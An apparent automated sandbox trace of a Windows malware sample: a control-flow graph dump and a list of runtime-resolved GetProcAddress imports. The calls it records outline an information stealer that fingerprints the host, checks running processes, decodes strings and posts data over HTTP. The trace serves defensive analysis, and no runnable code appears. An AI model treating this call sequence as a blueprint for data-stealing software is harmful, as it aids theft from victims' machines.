2f2000 39 API calls 15670->15671 15672 2f35a6 15671->15672 15673 2f2000 39 API calls 15672->15673 15674 2f35bc 15673->15674 15675 2f2000 39 API calls 15674->15675 15676 2f35d2 15675->15676 15677 2f2000 39 API calls 15676->15677 15678 2f35e8 15677->15678 15679 2f2000 39 API calls 15678->15679 15680 2f3601 15679->15680 15681 2f2000 39 API calls 15680->15681 15682 2f3617 15681->15682 15683 2f2000 39 API calls 15682->15683 15684 2f362d 15683->15684 15685 2f2000 39 API calls 15684->15685 15686 2f3643 15685->15686 15687 2f2000 39 API calls 15686->15687 15688 2f3659 15687->15688 15689 2f2000 39 API calls 15688->15689 15690 2f366f 15689->15690 15691 2f2000 39 API calls 15690->15691 15692 2f3688 15691->15692 15693 2f2000 39 API calls 15692->15693 15694 2f369e 15693->15694 15695 2f2000 39 API calls 15694->15695 15696 2f36b4 15695->15696 15697 2f2000 39 API calls 15696->15697 15698 2f36ca 15697->15698 15699 2f2000 39 API calls 15698->15699 15700 2f36e0 15699->15700 15701 2f2000 39 API calls 15700->15701 15702 2f36f6 15701->15702 15703 2f2000 39 API calls 15702->15703 15704 2f370f 15703->15704 15705 2f2000 39 API calls 15704->15705 15706 2f3725 15705->15706 15707 2f2000 39 API calls 15706->15707 15708 2f373b 15707->15708 15709 2f2000 39 API calls 15708->15709 15710 2f3751 15709->15710 15711 2f2000 39 API calls 15710->15711 15712 2f3767 15711->15712 15713 2f2000 39 API calls 15712->15713 15714 2f377d 15713->15714 15715 2f2000 39 API calls 15714->15715 15716 2f3796 15715->15716 15717 2f2000 39 API calls 15716->15717 15718 2f37ac 15717->15718 15719 2f2000 39 API calls 15718->15719 15720 2f37c2 15719->15720 15721 2f2000 39 API calls 15720->15721 15722 2f37d8 15721->15722 15723 2f2000 39 API calls 15722->15723 15724 2f37ee 15723->15724 15725 2f2000 39 API calls 15724->15725 15726 2f3804 15725->15726 15727 2f2000 39 API calls 15726->15727 15728 2f381d 15727->15728 15729 2f2000 39 API calls 15728->15729 15730 2f3833 15729->15730 15731 2f2000 39 API calls 15730->15731 15732 2f3849 
15731->15732 15733 2f2000 39 API calls 15732->15733 15734 2f385f 15733->15734 15735 2f2000 39 API calls 15734->15735 15736 2f3875 15735->15736 15737 2f2000 39 API calls 15736->15737 15738 2f388b 15737->15738 15739 2f2000 39 API calls 15738->15739 15740 2f38a4 15739->15740 15741 2f2000 39 API calls 15740->15741 15742 2f38ba 15741->15742 15743 2f2000 39 API calls 15742->15743 15744 2f38d0 15743->15744 15745 2f2000 39 API calls 15744->15745 15746 2f38e6 15745->15746 15747 2f2000 39 API calls 15746->15747 15748 2f38fc 15747->15748 15749 2f2000 39 API calls 15748->15749 15750 2f3912 15749->15750 15751 2f2000 39 API calls 15750->15751 15752 2f392b 15751->15752 15753 2f2000 39 API calls 15752->15753 15754 2f3941 15753->15754 15755 2f2000 39 API calls 15754->15755 15756 2f3957 15755->15756 15757 2f2000 39 API calls 15756->15757 15758 2f396d 15757->15758 15759 2f2000 39 API calls 15758->15759 15760 2f3983 15759->15760 15761 2f2000 39 API calls 15760->15761 15762 2f3999 15761->15762 15763 2f2000 39 API calls 15762->15763 15764 2f39b2 15763->15764 15765 2f2000 39 API calls 15764->15765 15766 2f39c8 15765->15766 15767 2f2000 39 API calls 15766->15767 15768 2f39de 15767->15768 15769 2f2000 39 API calls 15768->15769 15770 2f39f4 15769->15770 15771 2f2000 39 API calls 15770->15771 15772 2f3a0a 15771->15772 15773 2f2000 39 API calls 15772->15773 15774 2f3a20 15773->15774 15775 2f2000 39 API calls 15774->15775 15776 2f3a39 15775->15776 15777 2f2000 39 API calls 15776->15777 15778 2f3a4f 15777->15778 15779 2f2000 39 API calls 15778->15779 15780 2f3a65 15779->15780 15781 2f2000 39 API calls 15780->15781 15782 2f3a7b 15781->15782 15783 2f2000 39 API calls 15782->15783 15784 2f3a91 15783->15784 15785 2f2000 39 API calls 15784->15785 15786 2f3aa7 15785->15786 15787 2f2000 39 API calls 15786->15787 15788 2f3ac0 15787->15788 15789 2f2000 39 API calls 15788->15789 15790 2f3ad6 15789->15790 15791 2f2000 39 API calls 15790->15791 15792 2f3aec 15791->15792 15793 2f2000 39 API calls 
15792->15793 15794 2f3b02 15793->15794 15795 2f2000 39 API calls 15794->15795 15796 2f3b18 15795->15796 15797 2f2000 39 API calls 15796->15797 15798 2f3b2e 15797->15798 15799 2f2000 39 API calls 15798->15799 15800 2f3b47 15799->15800 15801 2f2000 39 API calls 15800->15801 15802 2f3b5d 15801->15802 15803 2f2000 39 API calls 15802->15803 15804 2f3b73 15803->15804 15805 2f2000 39 API calls 15804->15805 15806 2f3b89 15805->15806 15807 2f2000 39 API calls 15806->15807 15808 2f3b9f 15807->15808 15809 2f2000 39 API calls 15808->15809 15810 2f3bb5 15809->15810 15811 2f2000 39 API calls 15810->15811 15812 2f3bce 15811->15812 15813 2f2000 39 API calls 15812->15813 15814 2f3be4 15813->15814 15815 2f2000 39 API calls 15814->15815 15816 2f3bfa 15815->15816 15817 2f2000 39 API calls 15816->15817 15818 2f3c10 15817->15818 15819 2f2000 39 API calls 15818->15819 15820 2f3c26 15819->15820 15821 2f2000 39 API calls 15820->15821 15822 2f3c3c 15821->15822 15823 2f2000 39 API calls 15822->15823 15824 2f3c55 15823->15824 15825 2f2000 39 API calls 15824->15825 15826 2f3c6b 15825->15826 15827 2f2000 39 API calls 15826->15827 15828 2f3c81 15827->15828 15829 2f2000 39 API calls 15828->15829 15830 2f3c97 15829->15830 15831 2f2000 39 API calls 15830->15831 15832 2f3cad 15831->15832 15833 2f2000 39 API calls 15832->15833 15834 2f3cc3 15833->15834 15835 2f2000 39 API calls 15834->15835 15836 2f3cdc 15835->15836 15837 2f2000 39 API calls 15836->15837 15838 2f3cf2 15837->15838 15839 2f2000 39 API calls 15838->15839 15840 2f3d08 15839->15840 15841 2f2000 39 API calls 15840->15841 15842 2f3d1e 15841->15842 15843 2f2000 39 API calls 15842->15843 15844 2f3d34 15843->15844 15845 2f2000 39 API calls 15844->15845 15846 2f3d4a 15845->15846 15847 2f2000 39 API calls 15846->15847 15848 2f3d63 15847->15848 15849 307a40 15848->15849 15850 307efd 9 API calls 15849->15850 15851 307a4d 50 API calls 15849->15851 15852 307fa3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15850->15852 
15853 308017 15850->15853 15851->15850 15852->15853 15854 3080e1 15853->15854 15855 308024 8 API calls 15853->15855 15856 3080ea GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15854->15856 15857 30815e 15854->15857 15855->15854 15856->15857 15858 3081f7 15857->15858 15859 30816b 6 API calls 15857->15859 15860 308204 9 API calls 15858->15860 15861 3082da 15858->15861 15859->15858 15860->15861 15862 3082e3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15861->15862 15863 308357 15861->15863 15862->15863 15864 308360 GetProcAddress GetProcAddress 15863->15864 15865 30838b 15863->15865 15864->15865 15866 308394 GetProcAddress GetProcAddress 15865->15866 15867 3083bf 15865->15867 15866->15867 15868 3084b7 15867->15868 15869 3083cc 10 API calls 15867->15869 15870 3084c0 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15868->15870 15871 30851c 15868->15871 15869->15868 15870->15871 15872 308525 GetProcAddress 15871->15872 15873 308538 15871->15873 15872->15873 15874 308541 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15873->15874 15875 30859d 15873->15875 15874->15875 15876 3085a6 GetProcAddress 15875->15876 15877 3085b7 15875->15877 15876->15877 15877->14914 15879 301481 CloseHandle 15878->15879 15880 301453 Process32Next 15878->15880 15879->15080 15880->15879 15881 301465 StrCmpCA 15880->15881 15881->15880 15882 30147a 15881->15882 15882->15880 17248 30b170 15883->17248 15885 30b236 15885->15082 15887 2ff810 lstrcpy 15886->15887 15888 300b97 15887->15888 15889 2ff810 lstrcpy 15888->15889 15890 300ba5 GetSystemTime 15889->15890 15891 300bc3 15890->15891 15891->14918 15894 2ff96b 15892->15894 15893 2ff993 15893->14935 15894->15893 15895 2ff97f lstrcpy lstrcat 15894->15895 15895->15893 15897 2ff850 lstrcpy 15896->15897 15898 2f1090 15897->15898 15899 2ff850 lstrcpy 15898->15899 15900 2f109c 15899->15900 15901 2ff850 lstrcpy 15900->15901 15902 2f10a8 15901->15902 15903 2ff850 lstrcpy 
15902->15903 15904 2f10c0 15903->15904 15905 3039e0 15904->15905 15906 3039f2 15905->15906 15907 2ff8a0 2 API calls 15906->15907 15908 303a0f 15907->15908 15909 2ff8a0 2 API calls 15908->15909 15910 303a1c 15909->15910 15911 2ff8a0 2 API calls 15910->15911 15912 303a29 15911->15912 15913 2ff810 lstrcpy 15912->15913 15914 303a36 15913->15914 15915 2ff810 lstrcpy 15914->15915 15916 303a43 15915->15916 15917 2ff810 lstrcpy 15916->15917 15918 303a50 15917->15918 15919 2ff810 lstrcpy 15918->15919 15920 303a5d 15919->15920 15921 2ff810 lstrcpy 15920->15921 15922 303a6a 15921->15922 15923 2ff810 lstrcpy 15922->15923 15995 303a77 15923->15995 15924 2f1ee0 lstrcpy 15924->15995 15925 2f1f00 lstrcpy 15925->15995 15926 302fa0 29 API calls 15926->15995 15927 2ff850 lstrcpy 15927->15995 15928 303b46 StrCmpCA 15928->15995 15929 303ba9 StrCmpCA 15930 3041b8 15929->15930 15929->15995 15931 2ff8f0 lstrcpy 15930->15931 15933 3041c4 15931->15933 15932 2f1080 lstrcpy 15932->15995 15934 2f1f00 lstrcpy 15933->15934 15935 3041cd 15934->15935 15937 2ff8f0 lstrcpy 15935->15937 15936 303cf2 StrCmpCA 15938 304184 15936->15938 15936->15995 15939 3041d9 15937->15939 15941 2ff8f0 lstrcpy 15938->15941 15946 2f1fc0 lstrcpy 15939->15946 15940 2f1f20 lstrcpy 15940->15995 15942 304190 15941->15942 17280 2f1f00 15942->17280 15943 2ff8f0 lstrcpy 15943->15995 15944 2f1f40 lstrcpy 15944->15995 15948 304114 15946->15948 15951 2ff8f0 lstrcpy 15948->15951 15949 303e3b StrCmpCA 15952 304150 15949->15952 15949->15995 15950 2ff8f0 lstrcpy 15953 3041a5 15950->15953 15954 3041f6 15951->15954 15955 2ff8f0 lstrcpy 15952->15955 17283 2f1fc0 15953->17283 15957 2ff850 lstrcpy 15954->15957 15956 30415c 15955->15956 15958 2f1f60 lstrcpy 15956->15958 15960 30420c 15957->15960 15961 304165 15958->15961 15963 2ff850 lstrcpy 15960->15963 15962 2ff8f0 lstrcpy 15961->15962 15965 304171 15962->15965 15966 304218 15963->15966 15964 303f84 StrCmpCA 15967 304119 15964->15967 15964->15995 15974 2f1fe0 lstrcpy 15965->15974 15969 
2ff850 lstrcpy 15966->15969 15968 2ff8f0 lstrcpy 15967->15968 15971 304125 15968->15971 15994 304224 15969->15994 15970 303c8f StrCmpCA 15970->15995 15973 2f1f60 lstrcpy 15971->15973 15972 2f1f80 lstrcpy 15972->15995 15975 30412e 15973->15975 15974->15948 15977 2ff8f0 lstrcpy 15975->15977 15976 3040c7 StrCmpCA 15978 3040e2 15976->15978 15979 3040d2 Sleep 15976->15979 15980 30413a 15977->15980 15981 2ff8f0 lstrcpy 15978->15981 15979->15995 17277 2f1fe0 15980->17277 15982 3040ee 15981->15982 17274 2f1f60 15982->17274 15983 303dd8 StrCmpCA 15983->15995 15987 2ff8f0 lstrcpy 15988 304103 15987->15988 15990 2f1f60 lstrcpy 15988->15990 15989 303f21 StrCmpCA 15989->15995 15990->15948 15991 2f1f60 lstrcpy 15991->15995 15992 30406a StrCmpCA 15992->15995 15993 302ee0 24 API calls 15993->15995 15994->14948 15995->15924 15995->15925 15995->15926 15995->15927 15995->15928 15995->15929 15995->15932 15995->15936 15995->15940 15995->15943 15995->15944 15995->15949 15995->15964 15995->15970 15995->15972 15995->15976 15995->15983 15995->15989 15995->15991 15995->15992 15995->15993 15997 2ff867 15996->15997 15998 2ff87e 15997->15998 15999 2ff876 lstrcpy 15997->15999 15998->14974 15999->15998 16000->14993 16002 300446 16001->16002 16003 30044d GetVolumeInformationA 16001->16003 16002->16003 16004 300484 16003->16004 16005 3004b8 GetProcessHeap RtlAllocateHeap 16004->16005 16006 3004d2 16005->16006 16007 3004e4 wsprintfA lstrcat GetCurrentHwProfileA 16005->16007 16009 2ff810 lstrcpy 16006->16009 16008 30051f 16007->16008 16011 2ff810 lstrcpy 16008->16011 16010 3004dd 16009->16010 16010->15006 16012 300535 16011->16012 16013 30053d lstrlen 16012->16013 16014 300552 16013->16014 17286 301200 malloc strncpy 16014->17286 16016 30055c 16017 300566 lstrcat 16016->16017 16018 300576 16017->16018 16019 2ff810 lstrcpy 16018->16019 16020 300589 16019->16020 16020->15006 16022 2ff850 lstrcpy 16021->16022 16023 2f3e3a 16022->16023 17289 2f3d70 16023->17289 16025 2f3e46 16026 2ff810 lstrcpy 
16025->16026 16027 2f3e67 16026->16027 16028 2ff810 lstrcpy 16027->16028 16029 2f3e74 16028->16029 16030 2ff810 lstrcpy 16029->16030 16031 2f3e81 16030->16031 16032 2ff810 lstrcpy 16031->16032 16033 2f3e8e 16032->16033 16034 2ff810 lstrcpy 16033->16034 16035 2f3e9b 16034->16035 16036 2f3eab InternetOpenA StrCmpCA 16035->16036 16037 2f3ed1 16036->16037 16038 2f3edc 16037->16038 16039 2f4370 InternetCloseHandle 16037->16039 16040 300b80 2 API calls 16038->16040 16053 2f4382 16039->16053 16041 2f3ee7 16040->16041 16042 2ff940 2 API calls 16041->16042 16043 2f3ef7 16042->16043 16044 2ff8f0 lstrcpy 16043->16044 16045 2f3f00 16044->16045 16046 2ff9a0 3 API calls 16045->16046 16047 2f3f21 16046->16047 16048 2ff8f0 lstrcpy 16047->16048 16049 2f3f2a 16048->16049 16050 2ff9a0 3 API calls 16049->16050 16051 2f3f43 16050->16051 16052 2ff8f0 lstrcpy 16051->16052 16054 2f3f4c 16052->16054 16053->15012 16055 2ff940 2 API calls 16054->16055 16056 2f3f64 16055->16056 16057 2ff8f0 lstrcpy 16056->16057 16058 2f3f6d 16057->16058 16059 2ff9a0 3 API calls 16058->16059 16060 2f3f86 16059->16060 16061 2ff8f0 lstrcpy 16060->16061 16062 2f3f8f 16061->16062 16063 2ff9a0 3 API calls 16062->16063 16064 2f3fa8 16063->16064 16065 2ff8f0 lstrcpy 16064->16065 16066 2f3fb1 16065->16066 16067 2ff9a0 3 API calls 16066->16067 16068 2f3fd4 16067->16068 16069 2ff940 2 API calls 16068->16069 16070 2f3fdb 16069->16070 16071 2ff8f0 lstrcpy 16070->16071 16072 2f3fe4 16071->16072 16073 2f3ff4 InternetConnectA 16072->16073 16073->16039 16074 2f4020 HttpOpenRequestA 16073->16074 16075 2f4058 16074->16075 16076 2f4363 InternetCloseHandle 16074->16076 16077 2f405c InternetSetOptionA 16075->16077 16078 2f4072 16075->16078 16076->16039 16077->16078 16079 2ff9a0 3 API calls 16078->16079 16080 2f4083 16079->16080 16081 2ff8f0 lstrcpy 16080->16081 16082 2f408c 16081->16082 16083 2ff940 2 API calls 16082->16083 16084 2f40a4 16083->16084 16085 2ff8f0 lstrcpy 16084->16085 16086 2f40ad 16085->16086 16087 2ff9a0 3 API 
calls 16086->16087 16088 2f40c6 16087->16088 16089 2ff8f0 lstrcpy 16088->16089 16090 2f40cf 16089->16090 16091 2ff9a0 3 API calls 16090->16091 16092 2f40e9 16091->16092 16093 2ff8f0 lstrcpy 16092->16093 16094 2f40f2 16093->16094 16095 2ff9a0 3 API calls 16094->16095 16096 2f410b 16095->16096 16097 2ff8f0 lstrcpy 16096->16097 16098 2f4114 16097->16098 16099 2ff9a0 3 API calls 16098->16099 16100 2f412d 16099->16100 16101 2ff8f0 lstrcpy 16100->16101 16102 2f4136 16101->16102 16103 2ff940 2 API calls 16102->16103 16104 2f414e 16103->16104 16105 2ff8f0 lstrcpy 16104->16105 16106 2f4157 16105->16106 16107 2ff9a0 3 API calls 16106->16107 16108 2f4170 16107->16108 16109 2ff8f0 lstrcpy 16108->16109 16110 2f4179 16109->16110 16111 2ff9a0 3 API calls 16110->16111 16112 2f4192 16111->16112 16113 2ff8f0 lstrcpy 16112->16113 16114 2f419b 16113->16114 16115 2ff940 2 API calls 16114->16115 16116 2f41b3 16115->16116 16117 2ff8f0 lstrcpy 16116->16117 16118 2f41bc 16117->16118 16119 2ff9a0 3 API calls 16118->16119 16120 2f41d5 16119->16120 16121 2ff8f0 lstrcpy 16120->16121 16122 2f41de 16121->16122 16123 2ff9a0 3 API calls 16122->16123 16124 2f41f9 16123->16124 16125 2ff8f0 lstrcpy 16124->16125 16126 2f4202 16125->16126 16127 2ff9a0 3 API calls 16126->16127 16128 2f421b 16127->16128 16129 2ff8f0 lstrcpy 16128->16129 16130 2f4224 16129->16130 16131 2ff9a0 3 API calls 16130->16131 16132 2f423d 16131->16132 16133 2ff8f0 lstrcpy 16132->16133 16134 2f4246 16133->16134 16135 2ff940 2 API calls 16134->16135 16136 2f425e 16135->16136 16137 2ff8f0 lstrcpy 16136->16137 16138 2f4267 16137->16138 16139 2ff810 lstrcpy 16138->16139 16140 2f427c 16139->16140 16141 2ff940 2 API calls 16140->16141 16142 2f4294 16141->16142 16143 2ff940 2 API calls 16142->16143 16144 2f429b 16143->16144 16145 2ff8f0 lstrcpy 16144->16145 16146 2f42a4 16145->16146 16147 2f42bc lstrlen 16146->16147 16148 2f42cc 16147->16148 16149 2f42d5 lstrlen 16148->16149 17297 2ffa50 16149->17297 16151 2f42e5 HttpSendRequestA 
InternetReadFile 16152 2f4354 InternetCloseHandle 16151->16152 16155 2f4308 16151->16155 17298 2ff890 16152->17298 16154 2ff9a0 3 API calls 16154->16155 16155->16152 16155->16154 16156 2ff8f0 lstrcpy 16155->16156 16157 2f4339 InternetReadFile 16155->16157 16156->16155 16157->16152 16157->16155 17302 2ffa50 16158->17302 16160 30240c StrCmpCA 16161 302417 ExitProcess 16160->16161 16162 30241e 16160->16162 16163 30242e strtok_s 16162->16163 16164 302587 16163->16164 16177 30243f 16163->16177 16164->15015 16165 30256b strtok_s 16165->16164 16165->16177 16166 302460 StrCmpCA 16166->16165 16166->16177 16167 3024f3 StrCmpCA 16167->16165 16167->16177 16168 302533 StrCmpCA 16168->16165 16169 3024b4 StrCmpCA 16169->16165 16169->16177 16170 302557 StrCmpCA 16170->16165 16171 302498 StrCmpCA 16171->16165 16171->16177 16172 302508 StrCmpCA 16172->16165 16172->16177 16173 30247c StrCmpCA 16173->16165 16173->16177 16174 30251d StrCmpCA 16174->16165 16175 3024de StrCmpCA 16175->16165 16175->16177 16176 2ff8a0 2 API calls 16176->16177 16177->16165 16177->16166 16177->16167 16177->16168 16177->16169 16177->16170 16177->16171 16177->16172 16177->16173 16177->16174 16177->16175 16177->16176 16179 2ff850 lstrcpy 16178->16179 16180 2f5bca 16179->16180 16181 2f3d70 5 API calls 16180->16181 16182 2f5bd6 16181->16182 16183 2ff810 lstrcpy 16182->16183 16184 2f5bf7 16183->16184 16185 2ff810 lstrcpy 16184->16185 16186 2f5c04 16185->16186 16187 2ff810 lstrcpy 16186->16187 16188 2f5c11 16187->16188 16189 2ff810 lstrcpy 16188->16189 16190 2f5c1e 16189->16190 16191 2ff810 lstrcpy 16190->16191 16192 2f5c2b 16191->16192 16193 2f5c3b InternetOpenA StrCmpCA 16192->16193 16194 2f5c61 16193->16194 16195 2f5c6c 16194->16195 16196 2f6246 InternetCloseHandle 16194->16196 16197 300b80 2 API calls 16195->16197 16198 2f625c 16196->16198 16199 2f5c77 16197->16199 17303 2f6cd0 CryptStringToBinaryA 16198->17303 16200 2ff940 2 API calls 16199->16200 16202 2f5c87 16200->16202 16204 2ff8f0 lstrcpy 16202->16204 
16203 2f6262 16205 2ff8a0 2 API calls 16203->16205 16223 2f628c 16203->16223 16208 2f5c90 16204->16208 16206 2f6275 16205->16206 16207 2ff9a0 3 API calls 16206->16207 16209 2f6284 16207->16209 16211 2ff9a0 3 API calls 16208->16211 16210 2ff8f0 lstrcpy 16209->16210 16210->16223 16212 2f5cb1 16211->16212 16213 2ff8f0 lstrcpy 16212->16213 16214 2f5cba 16213->16214 16215 2ff9a0 3 API calls 16214->16215 16216 2f5cd3 16215->16216 16217 2ff8f0 lstrcpy 16216->16217 16218 2f5cdc 16217->16218 16219 2ff940 2 API calls 16218->16219 16220 2f5cf4 16219->16220 16221 2ff8f0 lstrcpy 16220->16221 16222 2f5cfd 16221->16222 16224 2ff9a0 3 API calls 16222->16224 16223->15026 16225 2f5d16 16224->16225 16226 2ff8f0 lstrcpy 16225->16226 16227 2f5d1f 16226->16227 16228 2ff9a0 3 API calls 16227->16228 16229 2f5d38 16228->16229 16230 2ff8f0 lstrcpy 16229->16230 16231 2f5d41 16230->16231 16232 2ff9a0 3 API calls 16231->16232 16233 2f5d64 16232->16233 16234 2ff940 2 API calls 16233->16234 16235 2f5d6b 16234->16235 16236 2ff8f0 lstrcpy 16235->16236 16237 2f5d74 16236->16237 16238 2f5d84 InternetConnectA 16237->16238 16239 2f6243 16238->16239 16240 2f5db0 HttpOpenRequestA 16238->16240 16239->16196 16241 2f6239 InternetCloseHandle 16240->16241 16242 2f5de9 16240->16242 16241->16239 16243 2f5ded InternetSetOptionA 16242->16243 16244 2f5e03 16242->16244 16243->16244 16245 2ff9a0 3 API calls 16244->16245 16246 2f5e14 16245->16246 16247 2ff8f0 lstrcpy 16246->16247 16248 2f5e1d 16247->16248 16249 2ff940 2 API calls 16248->16249 16250 2f5e35 16249->16250 16251 2ff8f0 lstrcpy 16250->16251 16252 2f5e3e 16251->16252 16253 2ff9a0 3 API calls 16252->16253 16254 2f5e57 16253->16254 16255 2ff8f0 lstrcpy 16254->16255 16256 2f5e60 16255->16256 16257 2ff9a0 3 API calls 16256->16257 16258 2f5e7b 16257->16258 16259 2ff8f0 lstrcpy 16258->16259 16260 2f5e84 16259->16260 16261 2ff9a0 3 API calls 16260->16261 16262 2f5e9f 16261->16262 16263 2ff8f0 lstrcpy 16262->16263 16264 2f5ea8 16263->16264 16265 2ff9a0 3 API calls 
16264->16265 16266 2f5ec1 16265->16266 16267 2ff8f0 lstrcpy 16266->16267 16268 2f5eca 16267->16268 16269 2ff940 2 API calls 16268->16269 16270 2f5ee2 16269->16270 16271 2ff8f0 lstrcpy 16270->16271 16272 2f5eeb 16271->16272 16273 2ff9a0 3 API calls 16272->16273 16274 2f5f04 16273->16274 16275 2ff8f0 lstrcpy 16274->16275 16276 2f5f0d 16275->16276 16277 2ff9a0 3 API calls 16276->16277 16278 2f5f26 16277->16278 16279 2ff8f0 lstrcpy 16278->16279 16280 2f5f2f 16279->16280 16281 2ff940 2 API calls 16280->16281 16282 2f5f47 16281->16282 16283 2ff8f0 lstrcpy 16282->16283 16284 2f5f50 16283->16284 16285 2ff9a0 3 API calls 16284->16285 16286 2f5f69 16285->16286 16287 2ff8f0 lstrcpy 16286->16287 16288 2f5f72 16287->16288 16289 2ff9a0 3 API calls 16288->16289 16290 2f5f8d 16289->16290 16291 2ff8f0 lstrcpy 16290->16291 16292 2f5f96 16291->16292 16293 2ff9a0 3 API calls 16292->16293 16294 2f5faf 16293->16294 16295 2ff8f0 lstrcpy 16294->16295 16296 2f5fb8 16295->16296 16297 2ff9a0 3 API calls 16296->16297 16298 2f5fd1 16297->16298 16299 2ff8f0 lstrcpy 16298->16299 16300 2f5fda 16299->16300 16301 2ff9a0 3 API calls 16300->16301 16302 2f5ff4 16301->16302 16303 2ff8f0 lstrcpy 16302->16303 16304 2f5ffd 16303->16304 16305 2ff9a0 3 API calls 16304->16305 16306 2f6016 16305->16306 16307 2ff8f0 lstrcpy 16306->16307 16308 2f601f 16307->16308 16309 2ff9a0 3 API calls 16308->16309 16310 2f6038 16309->16310 16311 2ff8f0 lstrcpy 16310->16311 16312 2f6041 16311->16312 16313 2ff940 2 API calls 16312->16313 16314 2f6059 16313->16314 16315 2ff8f0 lstrcpy 16314->16315 16316 2f6062 16315->16316 16317 2ff9a0 3 API calls 16316->16317 16318 2f607b 16317->16318 16319 2ff8f0 lstrcpy 16318->16319 16320 2f6084 16319->16320 16321 2ff9a0 3 API calls 16320->16321 16322 2f609e 16321->16322 16323 2ff8f0 lstrcpy 16322->16323 16324 2f60a7 16323->16324 16325 2ff9a0 3 API calls 16324->16325 16326 2f60c0 16325->16326 16327 2ff8f0 lstrcpy 16326->16327 16328 2f60c9 16327->16328 16329 2ff9a0 3 API calls 16328->16329 
16330 2f60e2 16329->16330 16331 2ff8f0 lstrcpy 16330->16331 16332 2f60eb 16331->16332 16333 2ff940 2 API calls 16332->16333 16334 2f6103 16333->16334 16335 2ff8f0 lstrcpy 16334->16335 16336 2f610c 16335->16336 16337 2f611c lstrlen 16336->16337 17308 2ffa50 16337->17308 16339 2f612d lstrlen GetProcessHeap RtlAllocateHeap 17309 2ffa50 16339->17309 16341 2f6150 lstrlen 17310 2ffa50 16341->17310 16343 2f6160 memcpy 17311 2ffa50 16343->17311 16345 2f6172 lstrlen 16346 2f6182 16345->16346 16347 2f618b lstrlen memcpy 16346->16347 17312 2ffa50 16347->17312 16349 2f61a7 lstrlen 17313 2ffa50 16349->17313 16351 2f61b7 HttpSendRequestA InternetReadFile 16352 2f622f InternetCloseHandle 16351->16352 16355 2f61da 16351->16355 16352->16241 16353 2ff9a0 3 API calls 16353->16355 16354 2ff8f0 lstrcpy 16354->16355 16355->16352 16355->16353 16355->16354 16356 2f6214 InternetReadFile 16355->16356 16356->16352 16356->16355 17314 2ffa50 16357->17314 16359 301e83 strtok_s 16360 301eed 16359->16360 16361 301e90 16359->16361 16360->15029 16362 301ed6 strtok_s 16361->16362 16363 2ff8a0 2 API calls 16361->16363 16364 2ff8a0 2 API calls 16361->16364 16362->16360 16362->16361 16363->16362 16364->16361 17315 2ffa50 16365->17315 16367 301c23 strtok_s 16368 301d4d 16367->16368 16374 301c34 16367->16374 16368->15042 16369 301d32 strtok_s 16369->16368 16369->16374 16370 301d04 StrCmpCA 16370->16374 16371 301c66 StrCmpCA 16371->16374 16372 301cd8 StrCmpCA 16372->16374 16373 301cac StrCmpCA 16373->16374 16374->16369 16374->16370 16374->16371 16374->16372 16374->16373 16375 2ff8a0 lstrlen lstrcpy 16374->16375 16375->16374 17316 2ffa50 16376->17316 16378 301da3 strtok_s 16382 301db4 16378->16382 16383 301e51 16378->16383 16379 301de8 StrCmpCA 16379->16382 16380 2ff8a0 2 API calls 16381 301e36 strtok_s 16380->16381 16381->16382 16381->16383 16382->16379 16382->16380 16382->16381 16384 2ff8a0 2 API calls 16382->16384 16383->15056 16384->16382 16386 2ff810 lstrcpy 16385->16386 16387 3044c3 16386->16387 
                                      Control-flow Graph (graph edge data omitted)
                                      APIs
                                      • GetProcAddress.KERNEL32(76E00000,02F3A150), ref: 00307A55
                                      • GetProcAddress.KERNEL32(76E00000,02F3A1B0), ref: 00307A6D
                                      • GetProcAddress.KERNEL32(76E00000,02F41BC0), ref: 00307A86
                                      • GetProcAddress.KERNEL32(76E00000,02F41CB0), ref: 00307A9E
                                      • GetProcAddress.KERNEL32(76E00000,02F41B18), ref: 00307AB6
                                      • GetProcAddress.KERNEL32(76E00000,02F41AE8), ref: 00307ACF
                                      • GetProcAddress.KERNEL32(76E00000,02F38AF8), ref: 00307AE7
                                      • GetProcAddress.KERNEL32(76E00000,02F41A40), ref: 00307AFF
                                      • GetProcAddress.KERNEL32(76E00000,02F41C20), ref: 00307B18
                                      • GetProcAddress.KERNEL32(76E00000,02F41D10), ref: 00307B30
                                      • GetProcAddress.KERNEL32(76E00000,02F41B78), ref: 00307B48
                                      • GetProcAddress.KERNEL32(76E00000,02F39EF0), ref: 00307B61
                                      • GetProcAddress.KERNEL32(76E00000,02F3A1F0), ref: 00307B79
                                      • GetProcAddress.KERNEL32(76E00000,02F39FB0), ref: 00307B91
                                      • GetProcAddress.KERNEL32(76E00000,02F39F30), ref: 00307BAA
                                      • GetProcAddress.KERNEL32(76E00000,02F41B30), ref: 00307BC2
                                      • GetProcAddress.KERNEL32(76E00000,02F41AB8), ref: 00307BDA
                                      • GetProcAddress.KERNEL32(76E00000,02F38828), ref: 00307BF3
                                      • GetProcAddress.KERNEL32(76E00000,02F3A1D0), ref: 00307C0B
                                      • GetProcAddress.KERNEL32(76E00000,02F41AD0), ref: 00307C23
                                      • GetProcAddress.KERNEL32(76E00000,02F41BD8), ref: 00307C3C
                                      • GetProcAddress.KERNEL32(76E00000,02F41C50), ref: 00307C54
                                      • GetProcAddress.KERNEL32(76E00000,02F41A58), ref: 00307C6C
                                      • GetProcAddress.KERNEL32(76E00000,02F39F90), ref: 00307C85
                                      • GetProcAddress.KERNEL32(76E00000,02F41A70), ref: 00307C9D
                                      • GetProcAddress.KERNEL32(76E00000,02F41B00), ref: 00307CB5
                                      • GetProcAddress.KERNEL32(76E00000,02F41B48), ref: 00307CCE
                                      • GetProcAddress.KERNEL32(76E00000,02F41BF0), ref: 00307CE6
                                      • GetProcAddress.KERNEL32(76E00000,02F41C08), ref: 00307CFE
                                      • GetProcAddress.KERNEL32(76E00000,02F41C38), ref: 00307D17
                                      • GetProcAddress.KERNEL32(76E00000,02F41C68), ref: 00307D2F
                                      • GetProcAddress.KERNEL32(76E00000,02F41A88), ref: 00307D47
                                      • GetProcAddress.KERNEL32(76E00000,02F41C80), ref: 00307D60
                                      • GetProcAddress.KERNEL32(76E00000,02F35050), ref: 00307D78
                                      • GetProcAddress.KERNEL32(76E00000,02F41CC8), ref: 00307D90
                                      • GetProcAddress.KERNEL32(76E00000,02F41AA0), ref: 00307DA9
                                      • GetProcAddress.KERNEL32(76E00000,02F3A210), ref: 00307DC1
